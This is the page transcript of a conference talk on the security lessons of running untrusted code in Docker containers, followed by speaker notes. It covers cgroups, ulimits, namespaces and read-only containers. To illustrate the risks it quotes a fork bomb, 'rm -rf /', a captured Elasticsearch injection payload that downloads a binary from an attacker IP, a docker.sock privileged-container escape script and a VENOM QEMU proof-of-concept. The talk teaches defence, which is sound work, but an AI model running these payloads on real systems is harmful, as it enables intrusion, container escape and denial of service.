Ben Hall, profile picture
Uploaded byBen Hall
PPTX, PDF429 views

Lessons from running potentially malicious code inside containers

The document discusses security challenges and practices when running potentially malicious code in Docker containers, highlighting the risks of providing unrestricted access to hosted environments. It covers various vulnerabilities, container management, and security measures such as cgroups and namespaces to mitigate risks. The importance of maintaining secure practices for Docker and Elasticsearch is emphasized to avoid compromising systems.

Embed presentation

Download to read offline
Lessons from running potentially malicious code inside containers @Ben_Hall Ben@BenHall.me.uk Ocelot Uproar / Katacoda.com
@Ben_Hall / Blog.BenHall.me.uk Docker London Organiser Software Development Studio WHOAMI?
“What happens when you give anonymous unrestricted access to a hosted Docker container & daemon?” This is how we [try to] protect ourselves
Learn via Interactive Browser-Based Labs Katacoda.com
Multi-tenant system PaaS CI Servers Untrusted 3rd Parties Docker Security Practices
The first “hack”
$ whoami $ pwd $ cd / $ ls $ apt-get install <some package> $ passwd $ rm –rf /
Dockerfile RUN adduser <new user> USER <new user> $ docker run –u <new user>
$ uptime $ free -m $ df -h $ cat /proc/cpuinfo $ uname -a
$ reboot $ shutdown now
“It also allows the container to access local network services + like D-bus and is therefore considered insecure” $ docker run --net=host -it ubuntu bash root@ubuntu:/# shutdown now root@ubuntu:/# $ docker run --net=host -it ubuntu bash Post http://docker:4243/v1.20/containers/create: EOF. * Are you trying to connect to a TLS-enabled daemon without TLS? * Is your docker daemon up and running?
Docker out of the box covers a lot but not everything…
$ while :; do echo 'Hello World'; done
Log Rotation since 1.8
$ fallocate Operation Not Supported $ truncate $ dd
Root users can write to it. If you can write to it, you can fill it. $ ls /docker/aufs/diff/<container-id>/ $ cat /docker/containers/<container-id>/hosts
Bandwidth
Difficult to restrict
CGroups and Namespaces
CPU Shares
:(){ :|: & };:
$ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398 Error response from daemon: Cannot start container efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398 : [8] System error: resource temporarily unavailable
Cgroup Settings • Limit a container to a share of the resource > --cpu-shares > --cpuset-cpus > --memory-reservation > --kernel-memory > --blkio-weight (block IO) > --device-read-iops > --device-write-iops
Namespaces limit what a container can see…
Seccomp & AppArmor
The Warden Based on Docker API + Magic Snort for Docker?
Sysdig Falco
What happens when it all goes wrong?
Hosting provider becomes unhappy
org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"s cript":"import java.util.*;nimport java.io.*;nString str = "";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("wget -O /tmp/xdvi http://<IP Address>:9985/xdvi").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();" }}}]] http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
C /bin C /bin/netstat C /bin/ps C /bin/ss C /etc C /etc/init.d A /etc/init.d/DbSecuritySpt A /etc/init.d/selinux C /etc/rc1.d A /etc/rc1.d/S97DbSecuritySpt A /etc/rc1.d/S99selinux C /etc/rc2.d A /etc/rc2.d/S97DbSecuritySpt A /etc/rc2.d/S99selinux C /etc/rc3.d A /etc/rc3.d/S97DbSecuritySpt A /etc/rc3.d/S99selinux C /etc/rc4.d A /etc/rc4.d/S97DbSecuritySpt A /etc/rc4.d/S99selinux C /etc/rc5.d http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/ A /etc/rc5.d/S97DbSecuritySpt A /etc/rc5.d/S99selinux C /etc/ssh A /etc/ssh/bfgffa A /os6 A /safe64 C /tmp A /tmp/.Mm2 A /tmp/64 A /tmp/6Sxx A /tmp/6Ubb A /tmp/DDos99 A /tmp/cmd.n A /tmp/conf.n A /tmp/ddos8 A /tmp/dp25 A /tmp/frcc A /tmp/gates.lod A /tmp/hkddos A /tmp/hsperfdata_root A /tmp/linux32 A /tmp/linux64 A /tmp/manager A /tmp/moni.lod A /tmp/nb A /tmp/o32 A /tmp/oba A /tmp/okml A /tmp/oni A /tmp/yn25 C /usr C /usr/bin A /usr/bin/.sshd A /usr/bin/dpkgd A /usr/bin/dpkgd/netstat A /usr/bin/dpkgd/ps A /usr/bin/dpkgd/ss
Read Only Containers > docker run –-read-only –v /data:/data elasticsearch
Is Docker Secure? • Yes. It’s as secure as your practices are. • ElasticSearch hack would have taken over entire box • I’ve pointed out the bad bits • New game, new rules to play by.
$ docker run benhall/cute-kittens Error: Missing docker.sock Usage: docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens $ docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens
if [ -e /var/run/docker.sock ]; then echo "**** Launching ****” docker run --privileged busybox ls /dev echo "**** Cute kittens ****" else echo "Error: Missing docker.sock” fi
DockerBench.com
Think VMs contain? • CVE-2016-3710: QEMU: out-of-bounds memory access issue • Venom QEMU/KVM – Attack via floppy driver #include <sys/io.h> #define FIFO 0x3f5 int main() { int i; iopl(3); outb(0x0a,0x3f5); /* READ ID */ for (i=0;i<10000000;i++) outb(0x42,0x3f5); /* push */ }
Available for one/two day Microservice/Docker Security training
Thank you! www.Katacoda.com @Ben_Hall Ben@BenHall.me.uk Blog.BenHall.me.uk

More Related Content

PPTX
Running Docker in Development & Production (#ndcoslo 2015)
byBen Hall
 
PPTX
Running .NET on Docker
byBen Hall
 
PPTX
The How and Why of Windows containers
byBen Hall
 
PPTX
Real World Lessons on the Pain Points of Node.js Applications
byBen Hall
 
PPTX
Running Docker in Development & Production (DevSum 2015)
byBen Hall
 
PPTX
Lessons from running potentially malicious code inside Docker containers
byBen Hall
 
PPTX
Real World Experience of Running Docker in Development and Production
byBen Hall
 
PPTX
Deploying Windows Containers on Windows Server 2016
byBen Hall
 
Running Docker in Development & Production (#ndcoslo 2015)
byBen Hall
 
Running .NET on Docker
byBen Hall
 
The How and Why of Windows containers
byBen Hall
 
Real World Lessons on the Pain Points of Node.js Applications
byBen Hall
 
Running Docker in Development & Production (DevSum 2015)
byBen Hall
 
Lessons from running potentially malicious code inside Docker containers
byBen Hall
 
Real World Experience of Running Docker in Development and Production
byBen Hall
 
Deploying Windows Containers on Windows Server 2016
byBen Hall
 

What's hot

PDF
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
byraccoony
 
PDF
Docker, c'est bonheur !
byAlexandre Salomé
 
PDF
Docker Runtime Security
bySysdig
 
PPT
Running High Performance and Fault Tolerant Elasticsearch Clusters on Docker
bySematext Group, Inc.
 
PDF
kubernetes practice
bywonyong hwang
 
ODP
Continuous Security
bySysdig
 
PDF
Wordpress y Docker, de desarrollo a produccion
bySysdig
 
PDF
Docker up and running
byVictor S. Recio
 
PPTX
Real World Lessons on the Pain Points of Node.JS Application
byBen Hall
 
PDF
CoreOS: Control Your Fleet
byMatthew Jones
 
PPTX
Deploying applications to Windows Server 2016 and Windows Containers
byBen Hall
 
PDF
Docker Security in Production Overview
byDelve Labs
 
PDF
Amazon EC2 Container Service in Action
byRemotty
 
PDF
Vagrant for real (codemotion rome 2016)
byMichele Orselli
 
PDF
2017-03-11 02 Денис Нелюбин. Docker & Ansible - лучшие друзья DevOps
byОмские ИТ-субботники
 
PPTX
Docker orchestration v4
byHojin Kim
 
PDF
Docker command
byEric Ahn
 
PDF
Docker remote-api
byEric Ahn
 
PDF
Scaling Next-Generation Internet TV on AWS With Docker, Packer, and Chef
bybridgetkromhout
 
PDF
Ansible 實戰:top down 觀點
byWilliam Yeh
 
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
byraccoony
 
Docker, c'est bonheur !
byAlexandre Salomé
 
Docker Runtime Security
bySysdig
 
Running High Performance and Fault Tolerant Elasticsearch Clusters on Docker
bySematext Group, Inc.
 
kubernetes practice
bywonyong hwang
 
Continuous Security
bySysdig
 
Wordpress y Docker, de desarrollo a produccion
bySysdig
 
Docker up and running
byVictor S. Recio
 
Real World Lessons on the Pain Points of Node.JS Application
byBen Hall
 
CoreOS: Control Your Fleet
byMatthew Jones
 
Deploying applications to Windows Server 2016 and Windows Containers
byBen Hall
 
Docker Security in Production Overview
byDelve Labs
 
Amazon EC2 Container Service in Action
byRemotty
 
Vagrant for real (codemotion rome 2016)
byMichele Orselli
 
2017-03-11 02 Денис Нелюбин. Docker & Ansible - лучшие друзья DevOps
byОмские ИТ-субботники
 
Docker orchestration v4
byHojin Kim
 
Docker command
byEric Ahn
 
Docker remote-api
byEric Ahn
 
Scaling Next-Generation Internet TV on AWS With Docker, Packer, and Chef
bybridgetkromhout
 
Ansible 實戰:top down 觀點
byWilliam Yeh
 

Viewers also liked

PDF
UI Automation_White_CodedUI common problems and tricks
byTsimafei Avilin
 
PPTX
Taking advantage of the Amazon Web Services (AWS) Family
byBen Hall
 
PPTX
Testing ASP.NET - Progressive.NET
byBen Hall
 
PDF
Fashion retail scenario in India
byTEXTILE VALUE CHAIN
 
PDF
Ananta Ortho Systems Private Limited, Vadodara, Orthopedic Implants And Instr...
byIndiaMART InterMESH Limited
 
PPTX
Node.js Anti Patterns
byBen Hall
 
PPTX
Tips on solving E_TOO_MANY_THINGS_TO_LEARN with Kubernetes
byBen Hall
 
PDF
Informe Final Conversatorio Taller Multisectorial de Pesca y Acuicultura. Reg...
byOannes, Señor de las Olas
 
PPTX
ITerior - .NET Core, usando .NET no Linux!
byVinicius Mussak
 
PPTX
Continuous deployment
byBen Hall
 
PPTX
Lucy Mcrae arquitecta del cuerpo
byHelena Formento
 
PPTX
The Art Of Building Prototypes and MVPs
byBen Hall
 
PPTX
Wall e el robot limpia ventanas
byluisfernandomontesmazo
 
PDF
Newsletters rwd
byErwan Tanguy
 
PPTX
What Designs Need To Know About Visual Design
byBen Hall
 
PDF
Kata - Devops CDSummit LA 2015
byJohn Willis
 
PDF
FNL_DO_Workplace Charging_85x14_NB
byZach Henkin, MBA, PMP
 
DOCX
Taller Tema de Investigación
byAndre Villarraga
 
PDF
Programa2013
bybetiviera
 
ODP
Receta
byMartaDominguez17
 
UI Automation_White_CodedUI common problems and tricks
byTsimafei Avilin
 
Taking advantage of the Amazon Web Services (AWS) Family
byBen Hall
 
Testing ASP.NET - Progressive.NET
byBen Hall
 
Fashion retail scenario in India
byTEXTILE VALUE CHAIN
 
Ananta Ortho Systems Private Limited, Vadodara, Orthopedic Implants And Instr...
byIndiaMART InterMESH Limited
 
Node.js Anti Patterns
byBen Hall
 
Tips on solving E_TOO_MANY_THINGS_TO_LEARN with Kubernetes
byBen Hall
 
Informe Final Conversatorio Taller Multisectorial de Pesca y Acuicultura. Reg...
byOannes, Señor de las Olas
 
ITerior - .NET Core, usando .NET no Linux!
byVinicius Mussak
 
Continuous deployment
byBen Hall
 
Lucy Mcrae arquitecta del cuerpo
byHelena Formento
 
The Art Of Building Prototypes and MVPs
byBen Hall
 
Wall e el robot limpia ventanas
byluisfernandomontesmazo
 
Newsletters rwd
byErwan Tanguy
 
What Designs Need To Know About Visual Design
byBen Hall
 
Kata - Devops CDSummit LA 2015
byJohn Willis
 
FNL_DO_Workplace Charging_85x14_NB
byZach Henkin, MBA, PMP
 
Taller Tema de Investigación
byAndre Villarraga
 
Programa2013
bybetiviera
 
Receta
byMartaDominguez17
 

Similar to Lessons from running potentially malicious code inside containers

PPTX
Docker Security Overview
bySreenivas Makam
 
PDF
Docker security
byJanos Suto
 
PDF
How Secure Is Your Container? ContainerCon Berlin 2016
byPhil Estes
 
PDF
Docker, Linux Containers, and Security: Does It Add Up?
byJérôme Petazzoni
 
ODP
Practical Container Security by Mrunal Patel and Thomas Cameron, Red Hat
byDocker, Inc.
 
PDF
Hacking Docker the Easy way
byBorg Han
 
PPTX
Docker Container Security
bySuraj Khetani
 
PDF
Down by the Docker
byNotSoSecure Global Services
 
PPTX
How Secure Are Docker Containers?
byBen Hall
 
PDF
Tokyo OpenStack Summit 2015: Unraveling Docker Security
byPhil Estes
 
PDF
Unraveling Docker Security: Lessons From a Production Cloud
bySalman Baset
 
PDF
Docker London: Container Security
byPhil Estes
 
PDF
Operating Docker
byJen Andre
 
PPTX
Securing docker containers
byMihir Shah
 
PPTX
Docker Security and Orchestration for DevSecOps wins
bySharath Kumar
 
PPTX
Docker Security
byantitree
 
PDF
Introduction to docker security
byWalid Ashraf
 
PDF
Work shop - an introduction to the docker ecosystem
byJoão Pedro Harbs
 
PDF
Start your container journey safely
byRachid Zarouali
 
PDF
Docker security 101 (CfgMgmtCamp 2019)
byFrank Louwers
 
Docker Security Overview
bySreenivas Makam
 
Docker security
byJanos Suto
 
How Secure Is Your Container? ContainerCon Berlin 2016
byPhil Estes
 
Docker, Linux Containers, and Security: Does It Add Up?
byJérôme Petazzoni
 
Practical Container Security by Mrunal Patel and Thomas Cameron, Red Hat
byDocker, Inc.
 
Hacking Docker the Easy way
byBorg Han
 
Docker Container Security
bySuraj Khetani
 
Down by the Docker
byNotSoSecure Global Services
 
How Secure Are Docker Containers?
byBen Hall
 
Tokyo OpenStack Summit 2015: Unraveling Docker Security
byPhil Estes
 
Unraveling Docker Security: Lessons From a Production Cloud
bySalman Baset
 
Docker London: Container Security
byPhil Estes
 
Operating Docker
byJen Andre
 
Securing docker containers
byMihir Shah
 
Docker Security and Orchestration for DevSecOps wins
bySharath Kumar
 
Docker Security
byantitree
 
Introduction to docker security
byWalid Ashraf
 
Work shop - an introduction to the docker ecosystem
byJoão Pedro Harbs
 
Start your container journey safely
byRachid Zarouali
 
Docker security 101 (CfgMgmtCamp 2019)
byFrank Louwers
 

More from Ben Hall

PPTX
Three Years of Lessons Running Potentially Malicious Code Inside Containers
byBen Hall
 
PPTX
The Art Of Documentation - NDC Porto 2022
byBen Hall
 
PPTX
Implementing Google's Material Design Guidelines
byBen Hall
 
PPTX
Scaling Docker Containers using Kubernetes and Azure Container Service
byBen Hall
 
PPTX
Architecting .NET Applications for Docker and Container Based Deployments
byBen Hall
 
PPTX
Deploying windows containers with kubernetes
byBen Hall
 
PPTX
The Challenges of Becoming Cloud Native
byBen Hall
 
PPTX
Containers without docker
byBen Hall
 
PPTX
Experimenting and Learning Kubernetes and Tensorflow
byBen Hall
 
PPTX
Real World Lessons On The Anti-Patterns of Node.JS
byBen Hall
 
PPTX
The Art of Documentation and Readme.md for Open Source Projects
byBen Hall
 
PPTX
The Art Of Documentation for Open Source Projects
byBen Hall
 
PPTX
The art of documentation and readme.md
byBen Hall
 
PPTX
Learning Patterns for the Overworked Developer
byBen Hall
 
PPTX
Learning to think "The Designer Way"
byBen Hall
 
Three Years of Lessons Running Potentially Malicious Code Inside Containers
byBen Hall
 
The Art Of Documentation - NDC Porto 2022
byBen Hall
 
Implementing Google's Material Design Guidelines
byBen Hall
 
Scaling Docker Containers using Kubernetes and Azure Container Service
byBen Hall
 
Architecting .NET Applications for Docker and Container Based Deployments
byBen Hall
 
Deploying windows containers with kubernetes
byBen Hall
 
The Challenges of Becoming Cloud Native
byBen Hall
 
Containers without docker
byBen Hall
 
Experimenting and Learning Kubernetes and Tensorflow
byBen Hall
 
Real World Lessons On The Anti-Patterns of Node.JS
byBen Hall
 
The Art of Documentation and Readme.md for Open Source Projects
byBen Hall
 
The Art Of Documentation for Open Source Projects
byBen Hall
 
The art of documentation and readme.md
byBen Hall
 
Learning Patterns for the Overworked Developer
byBen Hall
 
Learning to think "The Designer Way"
byBen Hall
 

Recently uploaded

PPTX
operating sys about shells and terminals commands .pptx
byYazeedAbdullah6
 
PPTX
Presentation on AWS Cloud RDS Deep dive
byBimal Jain
 
PDF
SCORM Cloud: The 5 categories of content distribution
byRustici Software
 
PPTX
Building a RAG System for Customer Support - L1
byBogdan Mustata
 
PPTX
Building AI agents in Java - Devoxx Belgium 2025
byJulien Dubois
 
PDF
inSis suite - Laboratory Information Management System
byKondapi V Siva Rama Brahmam
 
PDF
DSD-INT 2025 MeshKernel and D-Grid Editor - Stout
byDeltares
 
PPTX
Understanding-ROM-RAM-Cache-and-Buffer-Memory.pptx.pptx
bylata2850
 
PPTX
The Sync Strikes Back: Tales from the MOPs Trenches
bybbedford2
 
PDF
DSD-INT 2025 Flood Early Warning System for the Trans-African Hydrometeorolog...
byDeltares
 
PDF
Internship Project Training Report-3.pdf
byPawank36
 
PDF
DSD-INT 2025 Reviving a Lost Meander - Deen
byDeltares
 
PDF
DSD-INT 2025 Quantifying Flood Mitigation Strategies Under Sea Level Rise - H...
byDeltares
 
PDF
DSD-INT 2025 Climate and impact attribution of compound flooding induced by t...
byDeltares
 
PDF
DSD-INT 2025 Validation of SFINCS on Historical River Floods at the Global Sc...
byDeltares
 
PDF
DSD-INT 2025 Timor-Leste Flood exposure and Climate Change assessment - Ogunwumi
byDeltares
 
PDF
DSD-INT 2025 Next-Generation Flood Inundation Mapping for Taiwan - Challenges...
byDeltares
 
PDF
DSD-INT 2025 3D-modelling of salt intrusion into Germany’s busiest waterway -...
byDeltares
 
PDF
DSD-INT 2025 UK Coastal Flooding Incident Guide - Dam
byDeltares
 
PDF
DSD-INT 2025 Modelling Non-Newtonian Slurry Beaching with Delft3D-Slurry - Bi
byDeltares
 
operating sys about shells and terminals commands .pptx
byYazeedAbdullah6
 
Presentation on AWS Cloud RDS Deep dive
byBimal Jain
 
SCORM Cloud: The 5 categories of content distribution
byRustici Software
 
Building a RAG System for Customer Support - L1
byBogdan Mustata
 
Building AI agents in Java - Devoxx Belgium 2025
byJulien Dubois
 
inSis suite - Laboratory Information Management System
byKondapi V Siva Rama Brahmam
 
DSD-INT 2025 MeshKernel and D-Grid Editor - Stout
byDeltares
 
Understanding-ROM-RAM-Cache-and-Buffer-Memory.pptx.pptx
bylata2850
 
The Sync Strikes Back: Tales from the MOPs Trenches
bybbedford2
 
DSD-INT 2025 Flood Early Warning System for the Trans-African Hydrometeorolog...
byDeltares
 
Internship Project Training Report-3.pdf
byPawank36
 
DSD-INT 2025 Reviving a Lost Meander - Deen
byDeltares
 
DSD-INT 2025 Quantifying Flood Mitigation Strategies Under Sea Level Rise - H...
byDeltares
 
DSD-INT 2025 Climate and impact attribution of compound flooding induced by t...
byDeltares
 
DSD-INT 2025 Validation of SFINCS on Historical River Floods at the Global Sc...
byDeltares
 
DSD-INT 2025 Timor-Leste Flood exposure and Climate Change assessment - Ogunwumi
byDeltares
 
DSD-INT 2025 Next-Generation Flood Inundation Mapping for Taiwan - Challenges...
byDeltares
 
DSD-INT 2025 3D-modelling of salt intrusion into Germany’s busiest waterway -...
byDeltares
 
DSD-INT 2025 UK Coastal Flooding Incident Guide - Dam
byDeltares
 
DSD-INT 2025 Modelling Non-Newtonian Slurry Beaching with Delft3D-Slurry - Bi
byDeltares
 

Lessons from running potentially malicious code inside containers

  • 1.
    Lessons from running potentiallymalicious code inside containers @Ben_Hall Ben@BenHall.me.uk Ocelot Uproar / Katacoda.com
  • 2.
    @Ben_Hall / Blog.BenHall.me.uk DockerLondon Organiser Software Development Studio WHOAMI?
  • 3.
    “What happens whenyou give anonymous unrestricted access to a hosted Docker container & daemon?” This is how we [try to] protect ourselves
  • 4.
    Learn via InteractiveBrowser-Based Labs Katacoda.com
  • 5.
    Multi-tenant system PaaS CI Servers Untrusted3rd Parties Docker Security Practices
  • 7.
  • 8.
    $ whoami $ pwd $cd / $ ls $ apt-get install <some package> $ passwd $ rm –rf /
  • 10.
    Dockerfile RUN adduser <newuser> USER <new user> $ docker run –u <new user>
  • 11.
    $ uptime $ free-m $ df -h $ cat /proc/cpuinfo $ uname -a
  • 13.
  • 15.
    “It also allowsthe container to access local network services + like D-bus and is therefore considered insecure” $ docker run --net=host -it ubuntu bash root@ubuntu:/# shutdown now root@ubuntu:/# $ docker run --net=host -it ubuntu bash Post http://docker:4243/v1.20/containers/create: EOF. * Are you trying to connect to a TLS-enabled daemon without TLS? * Is your docker daemon up and running?
  • 16.
    Docker out ofthe box covers a lot but not everything…
  • 17.
    $ while :;do echo 'Hello World'; done
  • 18.
  • 19.
    $ fallocate Operation NotSupported $ truncate $ dd
  • 20.
    Root users canwrite to it. If you can write to it, you can fill it. $ ls /docker/aufs/diff/<container-id>/ $ cat /docker/containers/<container-id>/hosts
  • 21.
  • 22.
  • 24.
  • 25.
  • 26.
  • 27.
    $ docker run-d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398 Error response from daemon: Cannot start container efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398 : [8] System error: resource temporarily unavailable
  • 29.
    Cgroup Settings • Limita container to a share of the resource > --cpu-shares > --cpuset-cpus > --memory-reservation > --kernel-memory > --blkio-weight (block IO) > --device-read-iops > --device-write-iops
  • 30.
    Namespaces limit whata container can see…
  • 31.
  • 34.
    The Warden Based onDocker API + Magic Snort for Docker?
  • 35.
  • 36.
    What happens whenit all goes wrong?
  • 37.
  • 40.
    org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: ParseFailure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"s cript":"import java.util.*;nimport java.io.*;nString str = "";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("wget -O /tmp/xdvi http://<IP Address>:9985/xdvi").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();" }}}]] http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
  • 41.
    C /bin C /bin/netstat C/bin/ps C /bin/ss C /etc C /etc/init.d A /etc/init.d/DbSecuritySpt A /etc/init.d/selinux C /etc/rc1.d A /etc/rc1.d/S97DbSecuritySpt A /etc/rc1.d/S99selinux C /etc/rc2.d A /etc/rc2.d/S97DbSecuritySpt A /etc/rc2.d/S99selinux C /etc/rc3.d A /etc/rc3.d/S97DbSecuritySpt A /etc/rc3.d/S99selinux C /etc/rc4.d A /etc/rc4.d/S97DbSecuritySpt A /etc/rc4.d/S99selinux C /etc/rc5.d http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/ A /etc/rc5.d/S97DbSecuritySpt A /etc/rc5.d/S99selinux C /etc/ssh A /etc/ssh/bfgffa A /os6 A /safe64 C /tmp A /tmp/.Mm2 A /tmp/64 A /tmp/6Sxx A /tmp/6Ubb A /tmp/DDos99 A /tmp/cmd.n A /tmp/conf.n A /tmp/ddos8 A /tmp/dp25 A /tmp/frcc A /tmp/gates.lod A /tmp/hkddos A /tmp/hsperfdata_root A /tmp/linux32 A /tmp/linux64 A /tmp/manager A /tmp/moni.lod A /tmp/nb A /tmp/o32 A /tmp/oba A /tmp/okml A /tmp/oni A /tmp/yn25 C /usr C /usr/bin A /usr/bin/.sshd A /usr/bin/dpkgd A /usr/bin/dpkgd/netstat A /usr/bin/dpkgd/ps A /usr/bin/dpkgd/ss
  • 42.
    Read Only Containers >docker run –-read-only –v /data:/data elasticsearch
  • 45.
    Is Docker Secure? •Yes. It’s as secure as your practices are. • ElasticSearch hack would have taken over entire box • I’ve pointed out the bad bits • New game, new rules to play by.
  • 46.
    $ docker runbenhall/cute-kittens Error: Missing docker.sock Usage: docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens $ docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens
  • 47.
    if [ -e/var/run/docker.sock ]; then echo "**** Launching ****” docker run --privileged busybox ls /dev echo "**** Cute kittens ****" else echo "Error: Missing docker.sock” fi
  • 52.
  • 53.
    Think VMs contain? •CVE-2016-3710: QEMU: out-of-bounds memory access issue • Venom QEMU/KVM – Attack via floppy driver #include <sys/io.h> #define FIFO 0x3f5 int main() { int i; iopl(3); outb(0x0a,0x3f5); /* READ ID */ for (i=0;i<10000000;i++) outb(0x42,0x3f5); /* push */ }
  • 55.
    Available for one/twoday Microservice/Docker Security training
  • 56.

Editor's Notes

  • #12 Docker doesn’t support Kernel Virtualisation… hence information from host kernel is leaked
  • #16 User namespaces in 1.9 removes net=host https://github.com/dotcloud/docker/issues/6401
  • #18 https://github.com/docker/docker/pull/11485
  • #20 https://github.com/docker/docker/issues/3804
  • #21 User namespaces in 1.9 removes net=host https://github.com/dotcloud/docker/issues/6401
  • #22 Inbound – Waste bandwidth. Seed files. Outbound – DDoS, BitTorrent, Tor Relays, VPN… Lots of potential legal issues
  • #27 :(){ :|:& };: \_/| |||| ||\- ... the function ':', initiating a chain-reaction: each ':' will start two more. | | |||| |\- Definition ends now, to be able to run ... | | |||| \- End of function-block | | |||\- disown the functions (make them a background process), so that the children of a parent | | ||| will not be killed when the parent gets auto-killed | | ||\- ... another copy of the ':'-function, which has to be loaded into memory. | | || So, ':|:' simply loads two copies of the function, whenever ':' is called | | |\- ... and pipe its output to ... | | \- Load a copy of the function ':' into memory ... | \- Begin of function-definition \- Define the function ':' without any parameters '()' as follows:
  • #28 User namespaces in 1.9 removes net=host https://github.com/dotcloud/docker/issues/6401
  • #35 Monitors a containers CPU Usage, Disk Space & Bandwidth Sits on each local server. Means it will have priority thanks to CPU share. Communicates over unix socket so no bandwidth issues
  • #48 https://github.com/jerbia/container_hack